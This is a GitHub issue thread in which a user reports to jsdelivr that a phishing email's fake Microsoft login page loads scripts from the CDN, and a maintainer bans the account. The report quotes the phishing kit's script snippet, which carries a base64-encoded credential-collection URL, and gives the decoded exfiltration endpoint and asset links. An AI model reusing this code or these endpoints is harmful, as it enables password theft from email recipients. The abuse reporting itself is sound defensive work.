### ISSUE TITLE
Phishing email payload served by jsdelivr

### ISSUE THREAD

**Issue by ajspetner** [jsdelivr/jsdelivr#18514]
### Summary
Phishing email payload scripts served via jsdelivr

### Details
I received a phishing email that includes an HTML attachment which has a double encoded payload, which when decoded generates HTML that includes a fake Microsoft site login and includes the following code:
```
<script type="text/javascript">
    var shshhshshhsLove = "gotcha@example.com";
	
	//Add send.php file link here in base64 encoded, inside quotation mark;
	var SendPHPLink = "aHR0cHM6Ly93aHlyc2VzLmNvbS9kdWx1engvU2VuZE1lLnBocA==";
</script>
<script src="https://cdn.jsdelivr.net/gh/error1337/name@master/em.js"></script>
<script src="https://cdn.jsdelivr.net/gh/error1337/name@master/enc.js"></script>
```

The scripts populate the login form with the recipient's email address and when the password is entered, it submits to https://whyrses.com/duluzx/SendMe.php (the decoded value of the `SendPHPLink` variable seen above).

Other files referenced in the HTML include:

- https://cdn.jsdelivr.net/gh/error1337/name@master/favicon.ico
- https://cdn.jsdelivr.net/gh/error1337/name@master/bg.png
- https://cdn.jsdelivr.net/gh/error1337/name@master/micro.png

### Impact
Phishing, affects any recipient of this email

**Comment by jimaek** [comment]
I banned the user and all URLs will stop working soon after the changes propagate and caches expire. Thank you for reporting
